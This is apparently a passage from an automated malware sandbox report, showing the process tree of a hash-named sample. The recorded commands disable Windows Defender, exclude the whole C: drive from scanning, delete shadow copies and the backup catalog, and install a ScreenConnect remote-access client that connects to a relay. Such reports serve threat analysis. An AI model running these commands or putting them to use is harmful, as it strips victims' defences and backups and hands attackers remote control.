1656 cmd.exe 34 PID 1656 wrote to memory of 1560 1656 cmd.exe 35 PID 1656 wrote to memory of 1560 1656 cmd.exe 35 PID 1656 wrote to memory of 1560 1656 cmd.exe 35 PID 1656 wrote to memory of 1560 1656 cmd.exe 35 PID 1656 wrote to memory of 308 1656 cmd.exe 36 PID 1656 wrote to memory of 308 1656 cmd.exe 36 PID 1656 wrote to memory of 308 1656 cmd.exe 36 PID 1656 wrote to memory of 308 1656 cmd.exe 36 PID 1656 wrote to memory of 1736 1656 cmd.exe 37 PID 1656 wrote to memory of 1736 1656 cmd.exe 37 PID 1656 wrote to memory of 1736 1656 cmd.exe 37 PID 1656 wrote to memory of 1736 1656 cmd.exe 37 PID 1656 wrote to memory of 1732 1656 cmd.exe 38 PID 1656 wrote to memory of 1732 1656 cmd.exe 38 PID 1656 wrote to memory of 1732 1656 cmd.exe 38 PID 1656 wrote to memory of 1732 1656 cmd.exe 38 PID 1656 wrote to memory of 1968 1656 cmd.exe 39 PID 1656 wrote to memory of 1968 1656 cmd.exe 39 PID 1656 wrote to memory of 1968 1656 cmd.exe 39 PID 1656 wrote to memory of 1968 1656 cmd.exe 39 PID 1656 wrote to memory of 432 1656 cmd.exe 40 PID 1656 wrote to memory of 432 1656 cmd.exe 40 PID 1656 wrote to memory of 432 1656 cmd.exe 40 PID 1656 wrote to memory of 432 1656 cmd.exe 40 PID 1656 wrote to memory of 1692 1656 cmd.exe 41 PID 1656 wrote to memory of 1692 1656 cmd.exe 41 PID 1656 wrote to memory of 1692 1656 cmd.exe 41 PID 1656 wrote to memory of 1692 1656 cmd.exe 41 PID 1656 wrote to memory of 1888 1656 cmd.exe 42 PID 1656 wrote to memory of 1888 1656 cmd.exe 42 PID 1656 wrote to memory of 1888 1656 cmd.exe 42 PID 1656 wrote to memory of 1888 1656 cmd.exe 42 PID 1656 wrote to memory of 1080 1656 cmd.exe 43 PID 1656 wrote to memory of 1080 1656 cmd.exe 43 PID 1656 wrote to memory of 1080 1656 cmd.exe 43 PID 1656 wrote to memory of 1080 1656 cmd.exe 43 PID 1656 wrote to memory of 1720 1656 cmd.exe 44 PID 1656 wrote to memory of 1720 1656 cmd.exe 44 PID 1656 wrote to memory of 1720 1656 cmd.exe 44 PID 1656 wrote to memory of 1720 1656 cmd.exe 44
Processes
-
C:\Users\Admin\AppData\Local\Temp\c540c9b5b467d575f46433b78237f6e1.exe"C:\Users\Admin\AppData\Local\Temp\c540c9b5b467d575f46433b78237f6e1.exe"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Windows\SysWOW64\cmd.exe"cmd" /C cmd /c reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f & reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRealtimeMonitoring $true" & dism /online /disable-feature /featurename:windows-defender /remove /norestart /quiet & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Add-MpPreference -ExclusionPath C:\ -ErrorAction SilentlyContinue"2⤵
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\SysWOW64\cmd.execmd /c reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:432 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f4⤵PID:2016
-
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f3⤵PID:2004
-
-
\??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exec:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRealtimeMonitoring $true"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
-
C:\Windows\SysWOW64\Dism.exedism /online /disable-feature /featurename:windows-defender /remove /norestart /quiet3⤵
- Drops file in Windows directory
PID:1208
-
-
\??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exec:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
-
\??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exec:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:308
-
-
\??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exec:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1736
-
-
\??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exec:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1732
-
-
\??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exec:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1968
-
-
\??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exec:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:432
-
-
\??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exec:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1692
-
-
\??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exec:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1888
-
-
\??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exec:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1080
-
-
\??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exec:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1720
-
-
\??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exec:\windows\system32\windowspowershell\v1.0\powershell.exe "Add-MpPreference -ExclusionPath C:\ -ErrorAction SilentlyContinue"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1136
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C timeout 102⤵PID:804
-
C:\Windows\SysWOW64\timeout.exetimeout 103⤵
- Delays execution with timeout.exe
PID:1076
-
-
-
C:\Windows\tasks\MpResult.exe"C:\Windows\tasks\MpResult.exe"2⤵
- Executes dropped EXE
PID:2004 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2004 -s 5243⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1476
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C timeout 302⤵PID:2008
-
C:\Windows\SysWOW64\timeout.exetimeout 303⤵
- Delays execution with timeout.exe
PID:1284
-
-
-
C:\Windows\tasks\SA.exe"C:\Windows\tasks\SA.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:1080 -
C:\Windows\tasks\SA.exe"C:\Windows\tasks\SA.exe" n10803⤵
- Executes dropped EXE
PID:1536
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"3⤵PID:1720
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:1616
-
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet4⤵
- Deletes backup catalog
PID:924
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete4⤵PID:1092
-
-
-
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Windows\tasks\0.msi"2⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1412
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:840
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:692 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C785D976AD9FA515F342E1F1D071DC67 C2⤵
- Loads dropped DLL
PID:1900 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI1352.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259462266 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments3⤵
- Loads dropped DLL
PID:1972
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B6D68DC15C0E38A49FDFDBADE9C9DDA82⤵
- Loads dropped DLL
PID:588
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 7F8112C2C14327E4C85E3D81CDAEDEFC M Global\MSI00002⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:1184
-
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵PID:1380
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1656
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2016
-
C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.ClientService.exe"C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=instance-ik5pej-relay.screenconnect.com&p=443&s=a60c552f-9f0b-4dd5-904c-0ccd9212fff8&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zVeSGMrM9tjSmcGjFMIuyURXojoZNENzG7UM5aZF%2bqcw53mTJ4uRjJ7my742YfqvdqEv0F%2bvBqtPkyvQZQX7VKjWOs6KX89pV65ae014dBdhqIRQ%2feUjAx2MFIBKuSBNdhWUbkELS0qKb1oPsVIzst%2bHhgTLE3nWh5ag8s1Lvgy02hG5HM0ay%2bi1TowXRq9%2faSRe1qoK9SYcwuxU0zXzPl7tkshPvA7Z8jpsvcOBRNMz3fhBgbq7kDY%2bt4RbC50OHi%2fvku3xupvBXBKD0JnIaElhg2ICDmR3qr2TmKEwXQMIurOfpE9dng26klJNU8JNeytupnkksxce%2fyzzvPeo&t=&c=&c=&c=&c=&c=&c=&c=&c="1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2072 -
C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.WindowsClient.exe" "RunRole" "7358460f-4c3a-441d-96b2-94870076e8e9" "User"2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2260
-
-
C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.WindowsClient.exe" "RunRole" "903263a8-03af-48f0-a774-9d77c6079200" "System"2⤵
- Executes dropped EXE
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2336
-